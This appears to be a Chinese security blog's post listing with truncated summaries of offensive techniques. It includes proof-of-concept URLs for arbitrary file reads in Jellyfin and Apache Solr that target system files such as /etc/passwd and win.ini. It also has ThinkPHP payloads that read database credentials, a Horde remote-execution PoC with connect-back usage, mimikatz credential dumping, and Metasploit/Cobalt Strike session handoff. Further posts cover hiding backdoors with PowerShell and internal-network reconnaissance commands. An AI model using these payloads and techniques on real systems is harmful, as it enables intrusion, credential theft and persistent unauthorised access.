- 博客(16)
- 资源 (2)
- 收藏
- 关注
原创 捕获xx脚本分析
(1)详细说明近日我捕获到一个利用Apache2.4.49漏洞(CVE-2021-41773)传播xmrig-6.14.1-linux-static-x64挖矿脚本的最新样本。样本文件名为aaa,file命令判断为ASCII脚本。如下图所示:直接cat该文件(2)样本分析I. 该bash脚本经过混淆,将eval改为print,调试脚本第一遍运行得到bash -c "$(b...
2021-11-01 16:35:00
219
原创 Jellyfin任意文件读取漏洞(CVE-2021-21402)
FOFA语句:title="Jellyfin"可以通过访问http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/读取任意文件。POC:http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/strea...
2021-04-09 16:32:00
999
原创 Apache Solr 存在任意文件读取
访问:http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd (db为存在的应用名)
2021-04-09 16:07:00
214
原创 php绕过分号(;)和尖括号(<>)转义
实战中发现可写文件且内容可控,尝试写入phpinfo,发现分号(;)和尖括号(<>)被转义,如:尝试写入<?php phpinfo();?>实际得到:\<?php phpinfo()\;?\>分析分号(;)和尖括号(<>)两处转义,其中第一个尖括号转义不属于php内部,不起到转义作用,只是一个普通文本,不需要处理,第二个尖括号可以不...
2021-03-24 10:03:00
2440
原创 Thinkphp远程代码执行 payload汇总
Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwordhttp://url/to/thin...
2020-09-27 11:06:00
367
原创 截止9月20日,xx行动中已知漏洞
VMware Fusion cve-2020-3980权限提升Apache Cocoon security vulnerability cve-2020-11991Spring框架RFD(文件下载)CVE-2020-0618-SQLServer报表服务远程代码执行漏洞CVE-2020-7115-Aruba Clearpass远程代码执行漏洞CVE-2020-15148-Yii 2框架反...
2020-09-20 10:39:00
206
原创 CVE-2020-1472 域内提权
攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。影响版本Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Syste...
2020-09-16 05:52:00
106
原创 Horde Groupware Webmail Edition 远程命令执行
saturn:~ mr_me$ ./poc.py (+) usage ./poc.py <target> <path> <user:pass> <connectback:port>(+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 172.16.175.1:1337satur...
2020-09-13 21:18:00
345
原创 Apache Cocoon XML注入 [CVE-2020-11991]
受影响版本:Apache Cocoon <= 2.1.x程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。以下是apache社区官方提供利用方式:<!--?xml version="1.0" ?--> <!DOCTYPE replace [...
2020-09-13 21:15:00
269
原创 windows下hash抓取的几种方式
前提:在渗透测试过程中,对于windows系统的机器渗透需要注意hash的获取,其中hash分为LM-HASH与NTLM-HASH,在windows系统中,hash的默认存储位置为:C:\Windows\System32\config\SAM各种工具:mimikatzprivilege::debug sekurlsa::logonPasswordswcewce.ex...
2020-08-04 14:33:00
420
原创 msf+cobaltstrike联动(二):把cs中的机器spwan给msf
前提:CS已经获取到session,可以进入图形化管理机器,现在需要使用msf进行进一步渗透,需要msf的metepreter。 开启msfmsf设置监听msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload =>...
2020-08-04 14:30:00
368
原创 msf+cobaltstrike联动(一):把msf的session发给cobaltstrike
前提:MFS已经获取到session,可以进入metepreter,现在需要使用cobaltstrike进行图形化管理或团队协作。 cobaltstrike起一个beacon监听,如使用:windows/beacon_http/reverse_http 设置好host和port之后启动监听。MSF中使用use exploit/windows/local/payload_inject...
2020-08-04 14:25:00
653
原创 CS代理+proxychains+nmap进行内网扫描
前提:拿下边界机之后,进入内网,想用nmap怎么办? CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp_协议,要使用-Pn不使用ICMP_的ping确认主机存活...
2020-08-04 14:20:00
2010
原创 利用powershell隐藏执行后门
运行后门时,有些后门不能中断。双击运行这种后门会产生一个黑框。 一条命令就能使其在后台执行命令解释: start-process启动一个进程 -windowstyle窗口样式 hidden隐藏...
2020-08-04 14:17:00
735
原创 内网渗透
1.信息收集1.1.windows1.1.1用户操作query user #查看当前在线的用户whoami #查看当前用户net user #查看当前系统的用户net1 user #查看当前系统的用户net user /domain #查看当前域里面的用户net user administrator #查看当前用户的详细信息net localgroup #查看本地用户...
2020-08-04 14:15:00
182
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人